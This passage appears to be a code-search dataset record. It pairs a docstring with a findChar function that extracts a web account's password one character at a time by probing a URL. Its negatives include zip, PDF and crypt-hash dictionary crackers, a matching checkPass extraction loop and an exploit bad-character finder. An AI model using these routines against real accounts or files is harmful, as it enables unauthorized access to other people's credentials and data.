analyze another cell\n if new_state.letters[i[1]].isalpha():\n new_state.claim[i[2]] \\\n = new_state.get_current_player_name()[1]\n # analyze the other 3 cells\n if (new_state.get_current_player_name()[1]\n == new_state.letters[i[3]]\n or new_state.get_current_player_name()[1]\n == new_state.letters[i[4]]\n or new_state.get_current_player_name()[1]\n == new_state.letters[i[5]]) \\\n and new_state.claim[i[6]] == \"@\":\n new_state.claim[i[6]] \\\n = new_state.get_current_player_name()[1]\n # analyze the other 4 cells\n count = 0\n for x in [new_state.letters[i[7]],\n new_state.letters[i[8]],\n new_state.letters[i[9]],\n new_state.letters[i[10]]]:\n if new_state.get_current_player_name()[1] == x:\n count += 1\n if count == 2 and new_state.claim[i[11]] == \"@\":\n new_state.claim[i[11]] = \\\n new_state.get_current_player_name()[1]\n new_state.letters = [self.get_current_player_name()[1]\n if i == move else i for i in self.letters]\n return new_state", "def to_index(self, char):\n return ord(char) - ord(\"A\") - 32", "def check(self, text):\n p = self.d\n i = 0\n j = 0\n result = []\n ln = len(text)\n while i + j < ln:\n t = text[i + j].lower()\n # print i,j,hex(ord(t))\n if not (t in p):\n j = 0\n i += 1\n p = self.d\n continue\n p = p[t]\n j += 1\n # print p,i,j\n if chr(11) in p:\n p = self.d\n result.append(text[i:i + j])\n i = i + j\n j = 0\n return result", "def index(self, sub, start=0):\n br = \"([{\"[\")]}\".index(sub)]\n count = 0\n for i in range(start, len(self.string)):\n char = self.string[i]\n if char == br:\n count += 1\n elif char == sub:\n if count > 0:\n count -= 1\n else:\n return i\n raise SyntaxError(\"Bad string\")", "def _get_interleving(self, index):\n try:\n index = self._char_indexes[index - 1]\n except IndexError:\n return \"\"\n s = \"\"\n while True:\n index += 1\n if index in self._char_indexes:\n break\n elif index in self._code_indexes:\n s += self._raw_string[index]\n else:\n break\n return s", "def process_next_char(self): \n self.current_position += 1\n if self.current_position >= len(self.code_input):\n '''End of file since the position is equal to or greater than the input's position'''\n self.current_char = '\\0' #EOF\n print('end of line')\n self.current_char = self.code_input[self.current_position]", "def _updateGlyphs(self, pos, char=None):\n allVertices = []\n allIndices = []\n for k in range(len(self.text) - pos):\n idx = pos + k\n # Metric\n off, kern = self._updateMetric(idx, self.text[idx])\n # Handle special char\n if self.text[idx] in self.NO_GLYPH_CHARS:\n continue\n # Arrange vertices\n vertices = self.extracted[ord(self.text[idx])]['vertices'].copy()\n vertices['rgba'] = glm.vec4(self.colors[idx][1])\n vertices['vtx'] += (off + kern\n + self.extracted[ord(self.text[idx])]['offset'])\n allVertices.append(vertices)\n if char is None:\n head = self.text[:pos] + self.text[pos:idx]\n else:\n head = self.text[:pos + 1] + self.text[pos:idx]\n s = len(head.replace(' ', '').replace('\\n', ''))\n allIndices.append(self._baseInd + 4 * s)\n if len(allVertices) > 0 and len(allIndices) > 0:\n # Arrange vertices indices\n self.allVertices = np.append(self.allVertices,\n np.hstack(allVertices))\n self.allIndices = np.append(self.allIndices,\n np.vstack(allIndices), axis=0)", "def check_symbol(s,next_index,symbol):\n try:\n next_index = jump_over_space(s,next_index)\n if s[next_index:next_index + len(symbol)] == symbol:\n return next_index + len(symbol) # We must ignore the symbol\n except IndexError:\n return False\n else:\n return False", "def 
last_numeric_char(self, s):\n keep = {'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '-', '.'}\n i = 0\n not_done = True\n while not_done:\n if s[i] in keep:\n i += 1\n else:\n not_done = False\n\n if i >= len(s):\n not_done = False\n return i", "def _find_index(string):\n if string[0] == 'X':\n return 0\n elif string == 'D':\n return 1\n else:\n return np.where(sym == string)[0][0]", "def loop53(self, move, new_state, i):\n if move == i[0]:\n # analyze the other 3 cells\n if (new_state.get_current_player_name()[1]\n == new_state.letters[i[1]]\n or new_state.get_current_player_name()[1]\n == new_state.letters[i[2]]\n or new_state.get_current_player_name()[1]\n == new_state.letters[i[3]]) \\\n and new_state.claim[i[4]] == \"@\":\n new_state.claim[i[4]] \\\n = new_state.get_current_player_name()[1]\n\n # analyze the other 3 cells\n if (new_state.get_current_player_name()[1]\n == new_state.letters[i[5]]\n or new_state.get_current_player_name()[1]\n == new_state.letters[i[6]]\n or new_state.get_current_player_name()[1]\n == new_state.letters[i[7]]) \\\n and new_state.claim[i[8]] == \"@\":\n new_state.claim[i[8]] \\\n = new_state.get_current_player_name()[1]\n\n # analyze the other 4 cells\n count = 0\n for x in [new_state.letters[i[9]],\n new_state.letters[i[10]],\n new_state.letters[i[11]],\n new_state.letters[i[12]]]:\n if new_state.get_current_player_name()[1] == x:\n count += 1\n if count == 2 and new_state.claim[i[13]] == \"@\":\n new_state.claim[i[13]] = \\\n new_state.get_current_player_name()[1]\n new_state.letters = [self.get_current_player_name()[1]\n if i == move else i for i in self.letters]\n return new_state", "def index(sequence, i):\n try:\n return sequence[i]\n except IndexError:\n return u\"\"", "def step1c(self, word):\r\n\r\n if word.endswith('y'):\r\n result = word.rfind('y')\r\n base = word[:result]\r\n if self.containsVowel(base):\r\n word = base\r\n word += 'i'\r\n return word", "def write_at_pos(self, y, x, char_obj):\n # Add char to buffer\n if x < self.size.columns:\n if char_obj.z_index >= self._buffer[y][x].z_index:\n self._buffer[y][x] = char_obj", "def scol(string, i):\r\n return i - string.rfind('\\n', 0, max(0, i))", "def writechar(self, char: int, /) -> None:" ]
[ "0.7345728", "0.63285416", "0.6295855", "0.6295855", "0.6295855", "0.6295855", "0.6248521", "0.6134753", "0.6081834", "0.6037675", "0.60087425", "0.60087425", "0.60087425", "0.5981202", "0.58713824", "0.5847541", "0.5844085", "0.5784419", "0.5778379", "0.57567716", "0.5748923", "0.5732151", "0.5724007", "0.5698116", "0.56890285", "0.56728554", "0.56453645", "0.5633184", "0.56330824", "0.56323993", "0.5619063", "0.56095123", "0.5603394", "0.55648845", "0.5562105", "0.55591244", "0.5553795", "0.55504817", "0.5531478", "0.55311775", "0.55160105", "0.55160105", "0.5504568", "0.55043036", "0.5480531", "0.5477004", "0.5477004", "0.5477004", "0.5449778", "0.5443647", "0.5424742", "0.5398503", "0.53896534", "0.5389644", "0.53808904", "0.5380249", "0.53744507", "0.53665906", "0.5343387", "0.5342581", "0.5323371", "0.53205526", "0.53186244", "0.52960914", "0.52808225", "0.5254086", "0.5248224", "0.52311254", "0.52293015", "0.522578", "0.5220939", "0.5220939", "0.5220939", "0.5205152", "0.51909965", "0.5187803", "0.5185821", "0.5181714", "0.5179321", "0.5177283", "0.5175595", "0.5173398", "0.51702654", "0.516184", "0.51576304", "0.5141278", "0.51352894", "0.5127471", "0.51172745", "0.51118225", "0.5097097", "0.50947905", "0.5093373", "0.5085274", "0.50842357", "0.50828147", "0.5081467", "0.50807905", "0.5079265", "0.5070332", "0.50621927" ]
0.0
-1
helper function for checkPass: returns the first element of charList that works for the password at index i; if no character matches at index i, it prints i and returns an empty string instead of returning i.
def findChar(username, url, charList, i):
    """Return the first character in charList that matches the password at index i."""
    for ch in charList:
        if checkPasswordCharacter(ch, username, url, index=i):
            return ch
    # No character in charList matched at index i (e.g. i is past the end of
    # the password). Log the miss and return an empty string -- never "_",
    # because with wildcards enabled (the default) "_" would match any
    # character, and with wildcards disabled it would silently skip positions
    # that match nothing.
    print("Missing: " + str(i))  # log positions where nothing matched
    return ""
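A toy illustration of why returning "_" on a miss would be dangerous, assuming the per-character oracle is backed by a SQL LIKE pattern (a common setup for this kind of blind extraction; the snippet itself does not confirm it). In LIKE patterns "_" is a single-character wildcard, so a "_" fallback would match at every position and poison the recovered password:

def like_prefix_matches(secret, prefix):
    # toy stand-in for a blind LIKE 'prefix%' oracle: "_" matches any one char
    return len(prefix) <= len(secret) and all(
        p == "_" or p == s for p, s in zip(prefix, secret)
    )

print(like_prefix_matches("hunter2", "hun_"))  # True: "_" matches 't'
print(like_prefix_matches("hunter2", "hunx"))  # False: literal mismatch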
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def checkPass(username, url, charList, n):\n # dikt = {}\n password = \"\"\n for i in range(0, n):\n if(testPassword(password, username, url)):\n return password #password is found! \n # https://stackoverflow.com/questions/189645/how-to-break-out-of-multiple-loops-in-python\n ch = findChar(username, url, charList, i)\n # if(isinstance(ch, int))#if ch is int i, can't find a matching character at index i in password string \n # use try except instead of if(isinstance(ch, int)):\n # https://stackoverflow.com/questions/3501382/checking-whether-a-variable-is-an-integer-or-not\n try: \n password += ch\n except TypeError:\n # print(i)\n password += str(ch) #should be blank\n # raise ValueError(\"index i has no matching character\")\n return password #only reached if password is too long for the given n", "def valid_password(lower, upper, letter, password):\n # Note the -1 to turn 1 indexing into 0 indexing\n matches = [idx for idx in (lower, upper) if password[idx - 1] == letter]\n return len(matches) == 1", "def check_pass(password):\n # big_chain : length of longest chain of repeated symbols\n # c_start : index at which big_chain starts\n big_chain = 0\n cur_loc = 0\n for symb in password:\n if big_chain == 0:\n l_symb = symb\n cur_chain = 1\n big_chain = 1\n c_start = 0\n cur_c = cur_loc\n cur_loc += 1\n continue\n if symb == l_symb:\n cur_chain += 1\n else:\n cur_chain = 1\n cur_c = cur_loc\n if cur_chain > big_chain:\n big_chain = cur_chain\n c_start = cur_c\n cur_loc += 1\n l_symb = symb\n\n # return or repeat, need big_chain, c_start\n if big_chain < 2:\n return False\n if big_chain == 2:\n return True\n return (check_pass(password[:c_start])\n or check_pass(password[c_start+big_chain:]))", "def solve_part_two(self):\n password = list(\"XXXXXXXX\")\n index = 0\n counter = 0\n while counter < 8:\n (s, found_index) = self.find_next_hash(index)\n index = found_index + 1\n offset = ord(s[5]) - ord(\"0\")\n # Offset invalid or password character already set previously?\n if offset >= 8 or password[offset] != \"X\":\n continue\n password[offset] = s[6]\n counter += 1\n return \"\".join(password)", "def pass_check(user_found):\n password = ''\n while password != user_found[1]:\n password = stdiomask.getpass(prompt=\"Please enter your password: \", mask='*')\n pass1 = encrypter.encrypt_password(password)\n if user_found[1] == pass1:\n return \"\\nPassword match\\n\"\n else:\n print(\"\\nPassword do not match\\n\")", "def find_pass(pass_list, service):\r\n for pass_info in pass_list:\r\n if pass_info[1] == service:\r\n return pass_info[2]", "def SecondPart():\n return passwordChecker(data)", "def solve_part_one(self):\n password = \"\"\n index = 0\n while len(password) < 8:\n (s, found_index) = self.find_next_hash(index)\n password += s[5]\n index = found_index + 1\n return password", "def get_password():\n\n pwd = getpass(\"Enter your password below. 
It is used to protect your credentials.\\n\"\n \"The password must have a minimum length of 8 characters \"\n \"and can only contain alphanumeric characters and symbols.\\n\"\n \"Enter password (will be hidden): \")\n\n tries = 0 # Limit number of invalid attempts\n while True:\n if len(pwd) >= 8 and pwd.isascii() and pwd.isprintable() and ' ' not in pwd:\n if getpass(\"Confirm password: \") == pwd:\n return pwd\n else:\n print(\"Password mismatch!\")\n else:\n print(\"Invalid characters in password or too short!\")\n\n if tries == 3: return None\n pwd = getpass(\"\\nRe-enter password: \")\n tries += 1", "def find_password( door_id ):\n\n\tpassword = [ '', '', '', '', '', '', '', '' ]\n\tincrementor = 0\n\t\n\tfor _i in range( 8 ):\n\t\tchar = ''\n\t\twhile not char:\n\t\t\t#_do_stupid_movie_password_animation( password, _i )\n\n\t\t\tinput = door_id + str( incrementor )\n\t\t\tm = hashlib.md5( )\n\t\t\tm.update( input.encode( 'utf-8' ) )\n\t\t\thash = m.hexdigest( )\n\n\t\t\tif hash.startswith( '00000' ):\n\t\t\t\tloc = hash[ 5 ]\n\t\t\t\tchar = hash[ 6 ]\n\t\t\t\tif loc.isdigit( ):\n\t\t\t\t\tloc = int( loc )\n\t\t\t\t\tif 0 <= loc <= ( len( password ) - 1 ) and not password[ loc ]:\n\t\t\t\t\t\tpassword[ loc ] = char\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tchar = ''\n\t\t\t\telse:\n\t\t\t\t\tchar = ''\n\t\t\t\n\t\t\tincrementor += 1\n\n\tpassword = ''.join( password )\n\treturn password", "def get_password(args):\n for password in args:\n heashed=hash_password(password)\n print(heashed)\n # checked=check_password(heashed)", "def passwd_prompt():\n\n print(\"Passwords MUST contain AT LEAST: one lower-case letter,\" \n \"one number, one symbol, and be a MINIMUM of 8 characters in length,\"\n \"e.g. r!ght2oE\")\n\n while True:\n\n passy = getpass.getpass(prompt=\"Enter password for user: \")\n confirm_passy = getpass.getpass(prompt=\"To confirm, \" \\\n \"re-enter password: \")\n\n # check for the following conditions: \n # user input matches\n # length of input is at least 8 characters\n # input contains at least 1 number \n # input contains at least 1 letter \n # input contains at least 1 symbol \n \n if passy != confirm_passy \\\n or len(passy) <8 \\\n or not re.search('\\d', passy) \\\n or not re.search(r\"[a-z]\",passy) \\\n or not re.search(r\"[ !#$%&'()*+,-./[\\\\\\]^_`{|}~\"+r'\"]', passy): \n \n print(TRY_AGAIN)\n continue \n \n else:\n print(\"Password meets complexity requirement. 
Continuing...\") \n return passy", "def password(self) -> str:", "def passWord(pwd):\n pwdLen = len(pwd)\n if pwdLen < 4:\n raise Exception(\"The password is too short.\")\n if pwdLen > 8:\n raise Exception(\"tHE password is too long\")\n else:\n print('the length of the password is correct.')", "def find_valid_passwords(values: List[str]) -> int:\n search_reg = re.compile(\n r\"\\b(?P<first>[0-9]+)-(?P<second>[0-9]+)\\s(?P<letter>[a-z]):\\s(?P<password>[a-z]+)\")\n valid_password_count = 0\n\n for value in values:\n results = search_reg.search(value)\n target_char = results.group(\"letter\")\n password = results.group(\"password\")\n first_index = int(results.group(\"first\")) - 1\n second_index = int(results.group(\"second\")) - 1\n\n if (target_char == password[first_index]) != (target_char == password[second_index]):\n valid_password_count += 1\n\n return valid_password_count", "def FirstPart(): \n return passwordChecker_incorrect(data)", "def get_password(wordlen, digitlen, words, strength):\n\n while True:\n\n try:\n w = words.pop().capitalize()\n except IndexError:\n sys.exit(\"Unable to get a sufficiently strong password\")\n\n s = np.random.choice(SPECIAL_CHARS)\n i = np.random.randint(0, 10**digitlen)\n\n comp = [w, f\"{i:0{digitlen}d}\", s, s]\n np.random.shuffle(comp)\n pw = ''.join(comp)\n\n # pw = str(f\"{s}{w}{i:0{digitlen}d}{s}\")\n stats_pw = PasswordStats(pw)\n\n if stats_pw.strength() >= strength:\n return pw, stats_pw", "def analyze_password(password):\n vowels = number_of_vowels(password)\n if valid_password(password) is True:\n result = password + \" is a valid password and contains \" + str(vowels) + \" vowels.\"\n else:\n result = password + \" is not a valid password and contains \" + str(vowels) + \" vowels.\"\n return result", "def get_pass(self, item):\n text = str(self.get_contents(item), encoding=\"utf-8\")\n lines = text.split(\"\\n\")\n password = lines[0]\n return password", "def num_pw_found(byte_string):\n hasher = hashlib.sha1()\n hasher.update(byte_string)\n digest = hasher.hexdigest().upper()\n pw_list = requests.get('https://api.pwnedpasswords.com/range/{}'.format(digest[:5]))\n for line in pw_list.text.split('\\n'):\n info = line.split(':')\n if info[0] == digest[5:]:\n return int(info[1])\n return 0", "def testPassword(cryptPass, dictionaryFile):\n #salt = cryptPass[0:2]\n salt = crypt.mksalt(crypt.METHOD_SHA512) # Updated for SHA512 encrypted passwords\n dictFile = open(dictionaryFile, 'r')\n for word in dictFile.readlines():\n word = word.strip('\\n')\n cryptWord = crypt.crypt(word, salt)\n \n if cryptWord == cryptPass:\n print('[+] Found Password: ' + word + '\\n')\n return\n print('[-] Password Not Found.\\n')\n return", "def matchpassword(username, password): # create function called matchpassword\n \n List = [] # Initialize list\n\n try:\n f = open(\"C:\\Portable Python 3.2.5.1\\password.txt\",\"r\") # opens password.txt\n List = f.readlines() # Reads password.txt into a list\n f.close() # Closes password.txt file\n except IOError:\n print(\"I/O error: Unable to read in File f\") # Exception if I/O Error\n\n for x in range(0,len(List),2): # Loop thru list to determine if match\n Listlower = List[x].lower()\n if((username.lower() + '\\n' == Listlower) and (password + '\\n' == List[x + 1])):\n return 'True'\n else:\n continue\n return 'False'", "def password_generator(password_lenght):\r\n password = \"\"\r\n\r\n try:\r\n if password_lenght >=1:\r\n for i in range(password_lenght):\r\n choice = random.choice(symbols)\r\n password += 
str(choice)\r\n print(f\"Your password is: {password} \\nTnank you!\")\r\n return password\r\n else:\r\n return 0\r\n except Exception:\r\n pass", "def extremely_stupid_naive_brute_force_crap():\n keystrokes = [l.strip() for l in open(\"keylog.txt\")]\n for i in range(1000, 10000000):\n if i % 10000 == 0:\n print i\n password = str(i)\n if all(is_subsequence(password, keys) for keys in keystrokes):\n print password\n break", "def is_valid_password_v2(password):\n\n low = password[\"letter\"] == password[\"password\"][password[\"low\"] - 1]\n high = password[\"letter\"] == password[\"password\"][password[\"high\"] - 1]\n\n return xor(low, high)", "def iterate_pword(current_password):\n\n num = _pword_to_num(current_password) # Turn password into list of ints\n for idx in reversed(range(len(num))):\n char_ord = num[idx]\n if char_ord != 122:\n char_ord += 1\n num[idx] = char_ord\n break\n else:\n char_ord = 97\n num[idx] = char_ord\n return _num_to_pword(num)", "def getpassword(description = \"\"):\n\tif (description != \"\"): \n\t\tsys.stdout.write (\"%s\\n\" % description)\n\t\t\n\tpassword1 = getpass.getpass(\"Password: \");\n\tpassword2 = getpass.getpass(\"Password (confirm): \");\n\n\tif (password1 == password2):\n\t\treturn password1\n\telse:\n\t\tsys.stdout.write (colors.ORANGE + \"[Warning] Password did not match, please try again\" + colors.NO + \"\\n\")\n\t\treturn getpassword()", "def check_pwd(password: str) -> bool:\n # if len(password) > 0 and password[0].isdigit():\n # upper: List[Any] = [letter for letter in password if letter.isupper()]\n # lower: List[Any] = [letter for letter in password if letter.islower()]\n # return len(upper) > 1 and len(lower) > 0\n # else:\n # return False\n # Professor's solution\n return len(password) >= 4 \\\n and sum([1 for c in password if c.isupper()]) >= 2 \\\n and sum([1 for c in password if c.islower()]) >= 1 \\\n and password[0].isdigit()", "def generate_password():\n selection = string.ascii_letters + string.digits\n\n while True:\n password = \"\".join(secrets.choice(selection) for i in range(16))\n\n if (\n any(c.isupper() for c in password)\n and any(c.islower() for c in password)\n and any(c.isdigit() for c in password)\n ):\n break\n\n return password", "def _get_password_error_msg(password):\n # At least one letter and one digit\n if not any(c.isalpha() for c in password):\n return (\"The new password must contain at least one letter\", 'no_letter_in_password')\n if not any(c.isdigit() for c in password):\n return (\"The new password must contain at least one digit\", 'no_digit_in_password')\n return None", "def password_validation(pass1,pass2):\n errors = []\n if(pass1 != pass2):\n errors.append(\"Lösenorden matchade inte.\")\n if(len(pass1) < 3):\n errors.append(\"Lösenordet måste vara längre än 3 bokstöver.\")\n \n return errors", "def valida_digito(password):\n for s in password:\n if s.isdigit() == True: \n return True\n return False", "def has_right_symbols(string):\n for letter in string:\n if letter in \"$#@\":\n return True\n # End of the loop, we still didn't see any numbers, else we \n # woud have exited the function\n print(\"Your password needs to contain one of those symbols: $#@\")\n return False", "def check_pwd_policy2(processed):\n policy, letter, pwd = processed\n idx1 = policy[0] - 1\n idx2 = policy[-1] - 1\n return (pwd[idx1] == letter) ^ (pwd[idx2] == letter)", "def password_alphanumeric(i):\r\n\r\n chars = string.ascii_letters + string.digits\r\n return ''.join(_random.choice(chars) for x in range(i))", "def 
get_new_user_pword():\n pword = input(\"Password (3–20 alphanumeric characters): \")\n menu.option_to_exit(pword)\n try:\n if len(pword) < 3 or len(pword) > 20 or not pword.isalnum():\n raise ValueError\n except ValueError:\n print(\"Password must be 3–20 alphanumeric characters.\\n\"\n \"Please try again.\\n\")\n return get_new_user_pword()\n else:\n return pword", "def main():\n password = input(\"Enter password that contains {} or more characters: \".format(MIN_LENGTH))\n while not is_valid_password(password):\n print(\"Invalid password!\")\n password = input(\"Enter password that contains {} or more characters: \".format(MIN_LENGTH))\n print(\"*\" * len(password))", "def check_password(password):\n\n sha1 = hashlib.sha1(password.encode(\"utf-8\")).hexdigest()\n\n response = requests.get(f\"https://api.pwnedpasswords.com/range/{sha1[:5]}\")\n\n hash_suffix_list = [x.split(\":\") for x in response.text.splitlines(False)]\n\n try:\n count = [\n count for suffix, count in hash_suffix_list if sha1.endswith(suffix.lower())\n ][0]\n except IndexError:\n return 0\n\n return int(count)", "def solve():\n cipher_bytes = get_cipher_bytes()\n best_so_far = 0\n message = None\n for password in get_passwords_iterator():\n possible_message = decrypt_cipher(cipher_bytes, password)\n if possible_message:\n num_spaces = len(filter(lambda x: x == ' ', possible_message))\n if num_spaces >= best_so_far:\n best_so_far = num_spaces\n message = possible_message\n print ''.join(message)\n answer = sum([ord(c) for c in message])\n return answer", "def check_pwd_policy1(processed):\n policy, letter, pwd = processed\n return pwd.count(letter) in policy", "def evaluate_password_health(users, print_password=False):\n hasUpperCase = \"[A-Z]\"\n hasLowerCase = \"[a-z]\"\n hasNumbers = \"\\d\"\n hasNonalphas = \"\\W\"\n results = []\n for username, password in users.items():\n # print(\"testing: %s:%s\" % (username, password))\n if print_password:\n printable_pass = password\n else:\n printable_pass = \"\"\n\n rules_dict = {\"username\":username,\"password\":printable_pass,\"Length\":1,\"Capital\":1,\"Lower\":1,\"Digits\":1,\"Symbols\":1}\n\n if len(password) < 8:\n print(\"Policy breach, too short : %s %s\" % (username, printable_pass))\n rules_dict[\"Length\"] = \"0\"\n\n elif len(password) > 8:\n # print(\"larger than 8\")\n # raw_input('asdfasdf')\n breakRules = []\n score = 0;\n bestCase = 4\n # pprint(re.search(hasUpperCase, password))\n\n if not re.search(hasUpperCase, password):\n breakRules.append(\"no upper case\")\n rules_dict[\"Capital\"] = 0\n # print(\"upper\")\n if not re.search(hasLowerCase, password):\n breakRules.append(\"no lower case\")\n rules_dict[\"Lower\"] = 0\n # print(\"lower\")\n\n if not re.search(hasNumbers, password):\n breakRules.append(\"no numbers\")\n rules_dict[\"Digits\"] = 0\n\n # print(\"numbers\")\n\n if not re.search(hasNonalphas, password):\n breakRules.append(\"non symbols\")\n rules_dict[\"Symbols\"] = 0\n\n # print(\"nonalphas\")\n\n score = bestCase - len(breakRules)\n\n # print(\"%s score %s \"%(password,score)) \n # raw_input('asdfasdf')\n if score <3:\n print(\"================\\nPolicy breach: %s:%s %s \" % (username, printable_pass, score ))\n\n for el in breakRules:\n print(\"Broken Rule: %s\"%el)\n\n print(\"================\")\n results.append(rules_dict)\n return results", "def check_pass(self, user, app):\r\n infos = self.curs.execute(f\"SELECT login, password FROM {user} WHERE application = '{app}'\")\r\n return list(infos)[0]", "def _findHashInChain(self, 
startPwd, startHash):\n hashV = self.hashWord(startPwd)\n if hashV == startHash:\n return startPwd\n col = 0\n # Hash and reduce until the password has been found or the end of\n # the chain has been reached.\n while col < self.columns:\n pwd = self.reduce(hashV, col)\n hashV = self.hashWord(pwd)\n if hashV == startHash:\n # If the password has been found, return it\n return pwd\n col += 1\n # If the password hasn't been found, return None.\n return None", "def first_unique_character_list(string: str) -> int:\n counts = [0] * 26\n\n def get_idx(character: str) -> int:\n return ord(character) - 97\n\n for char in string:\n idx = get_idx(char)\n counts[idx] += 1\n\n for i, char in enumerate(string):\n idx = get_idx(char)\n if counts[idx] == 1:\n return i\n\n return -1", "def test_valid_password(self):\n pass_field = Field(\"\".join(['x' * (int(self.app.config['MAX_PWD_LEN']))]))\n\n valid_password(None, pass_field)", "def display_pass():\n return passlocker.display_passlocker()", "def contains_only_double_digit(password: int) -> bool:\n word = str(password)\n\n if word[0] == word[1] and word[0] != word[2]:\n return True\n if word[-2] == word[-1] and word[-2] != word[-3]:\n return True\n\n for i in range(1, len(word)-2):\n if word[i] == word[i+1] and word[i] != word[i+2] and word[i] != word[i-1]:\n return True\n\n return False", "def check_password(pw):\n if (pw == password):\n print('welcome password match')\n\n else:\n print('Wrong password')", "def valid_pass(password):\r\n if len(password) >= 8 and len(password) <= 25 and password != \"forgot\":\r\n return True\r\n\r\n else:\r\n print(\"This is not a vaid password\")\r\n print(\"Password should be between 8 and 25 letters\")\r\n\r\n return False", "def generate_password(self): \n\n password = []\n length = input(\"Enter Length for Password (At least 8): \")\n\n if length.lower().strip() == \"exit\":\n raise UserExits\n elif length.strip() == \"\":\n raise EmptyField\n elif int(length) < 8:\n raise PasswordNotLongEnough\n else:\n # generating a password\n spinner = Halo(text=colored(\"Generating Password\", \"green\"), spinner=self.dots_, color=\"green\")\n spinner.start()\n for i in range(0, int(length)):\n #choose character from one of the lists randomly\n password.append(random.choice(random.choice([string.ascii_lowercase, string.ascii_uppercase, string.digits, self.specialChar_])))\n\n finalPass = \"\".join(password)\n spinner.stop()\n\n return finalPass", "def valid_password(password):\n val = True\n\n if len(password) < 8:\n val = False\n return val\n\n if not any(char.isdigit() for char in password):\n val = False\n return val\n\n if not any(char.isupper() for char in password):\n val = False\n return val\n\n if not any(char.islower() for char in password):\n val = False\n return val\n\n if val:\n return val", "def find_name_and_password(ip):\r\n names_pass = get_name_pass(ip)\r\n\r\n start = time.time()\r\n\r\n pool = Pool(4) # 4 is number of processes to open at once\r\n results = pool.map(check_name_and_password, names_pass)\r\n pool.close()\r\n\r\n end = time.time()\r\n\r\n print \"\\nTime to complete: %d \\n\" % (end - start)\r\n results = [t for t in results if t] # filters out empty tuples\r\n return results", "def bruteforce_pdf(pdf_file_path: Path, wordlist: list) -> Union[str, None]:\n\n start_time = time.time()\n for word in [\"\"] + wordlist:\n try:\n with Pdf.open(pdf_file_path, password=word):\n if not word:\n return print(f\"\\n{Color.EMPHASIS}The PDF file provided is not encrypted.{Color.END}\")\n 
print(f\"\\n\\n{Color.INFORMATION}Password is: {Color.EMPHASIS}{word}{Color.END}\")\n print(f\"\\n\\n{Color.DETAIL}Found at index: {wordlist.index(word) + 1}\\n\")\n print(f\"{Color.DETAIL}Time elapsed: {(time.time() - start_time):.3f} secs{Color.END}\")\n return word\n except:\n print(f\"{Color.INFORMATION} Trying: {Color.FAIL}{word}{Color.END}\", end=\"\\r\")\n return print(f\"\\n\\n{Color.EMPHASIS}No password matched from the provided wordlist.{Color.END}\")", "def _cbPasswordMatch(self, matched, username):\r\n if matched:\r\n return username\r\n else:\r\n return failure.Failure(error.UnauthorizedLogin())", "def _cbPasswordMatch(self, matched, username):\r\n if matched:\r\n return username\r\n else:\r\n return failure.Failure(error.UnauthorizedLogin())", "def brute_force_attack(string):\n try:\n for key in range(1, 26):\n string_to_return = \"\"\n for l in string:\n if not(l >= 'A'and l <= 'Z' or l >= 'a'and l <= 'z'):\n string_to_return += l\n elif key + ord(l.upper()) > ord('Z'):\n string_to_return += chr(ord('A') + ord('Z') - ord(l.upper()))\n else:\n string_to_return += chr(ord(l.upper())+key)\n print(string_to_return)\n return string_to_return\n except Exception as ex:\n print(EXCEPTION_MESSAGE, ex)", "def check_for_validity_puzzle_2(pos: tuple, char: str, password: str):\n\n valid_pos, invalid_pos = pos\n # using xor\n if (password[valid_pos-1] == char) ^ (password[invalid_pos-1] == char):\n return True\n else:\n return False", "def password (string):\n\t\n\treturn hexdigest_mySQL41plus (string)", "def Cracker():\n attempts = 0\n flag = 0\n with open(dictionary_attack, 'r') as attack:\n print(\"Cracking password...one sec\")\n print(\"------------------------------\")\n for line in attack:\n \"\"\"\n Using a try...exception to keep attempting\n the different passwords from the wordlist\n \"\"\"\n try:\n # from the wordlist there is newline\n # they need to be stripped\n # encode passwd from str to bytes\n passwd = line.strip('\\n')\n zFile.extractall(pwd=str.encode(passwd))\n except Exception:\n attempts += 1\n pass\n else:\n print(\"Success! Password is %s\" % (passwd))\n flag = 1\n break\n print(\"Attempted %d passwords from %s wordlist\" %\n (attempts, dictionary_attack))\n if flag == 0:\n print(\"Password Cracking Failed! 
It is too strong for me :(\")", "def check_best_user(correct_user_pass):\r\n best = (\"notfound\", \"notfound\")\r\n for user_pass in correct_user_pass:\r\n if user_pass[0] == \"root\":\r\n best = user_pass\r\n elif user_pass[0] == \"admin\" and best[0] != \"root\":\r\n best = user_pass\r\n elif best[0] != \"root\" and best[0] != \"admin\":\r\n best = user_pass\r\n return best", "def password_is_valid_1(password, character, num_1, num_2):\n # count how often does each character occurs\n counter = Counter(password)\n character_count = counter[character] # defaults to zero if character doesn't exist at all\n return num_1 <= character_count <= num_2", "def is_allowed_password(password):\n if not is_filled_password(password):\n return \"Password is a required field.\"\n elif not is_regex_password(password):\n return \"That is not a valid password.\"\n else:\n return \"\"", "def puzzle(word_list):\n \n multiple_stroke_letters = ['i','j','t','x']\n for word in word_list:\n if word.count('i')==1 and word.count('j')==1 and word.count('t')==1 \\\n and word.count('x')==1:\n print(word)\n break", "def search_bad_chars() -> str:\n\n lines = get_input()\n bad_chars = \"\\\\\"+hex(0) # x00 is always a badchar\n \n for i in range(1,255,8):\n for i in range(i,i+7):\n lines[i] = int(lines[i],16)\n if(hex(i) != hex(lines[i])):\n bad_chars += \"\\\\\"+hex(i)\n \n print(\"Found these bad characters:\",bad_chars)\n\n return bad_chars", "def encontrar_passwords():\n hashes = [\n ('ox', 'ox45K6RsEUfmQ', generar_palabras()), # fido\n ('$1$42dJ1xYh', '$1$42dJ1xYh$MfrRke8/Ej3h5.vMtNEhC.', leer_palabras('./colores.txt')), # white\n ('$6$SZGpKoPi', '$6$SZGpKoPi$GGGqHYKy6PO/H5nvV0AmaGB/5krnxVuz2k2uX81O.CF5nYctE5RlR/rzJQCL3ZsF8yratCRbSR2ZuwKzvve.D0', leer_palabras('./equipos.txt')), # knicks\n ]\n\n encontradas = []\n\n for algo_y_salt, hash_resultado, origen_passwords in hashes:\n for password in origen_passwords:\n if crypt(password, algo_y_salt) == hash_resultado:\n encontradas.append(password)\n break\n\n return encontradas", "def password_is_valid_task_2(row):\n # XOR the two positions in the password\n return (row['letter'] == row['password'][row['policy'][0] - 1]) != \\\n (row['letter'] == row['password'][row['policy'][1] - 1])", "def _do_stupid_movie_password_animation( password, digits_solved ):\n\n\tpwd = copy.copy( password )\n\tfor i in range( len( pwd ) - digits_solved ):\n\t\tchar = ''\n\t\twhile not char:\n\t\t\tval = random.randint( 48, 102)\n\t\t\tif not 58 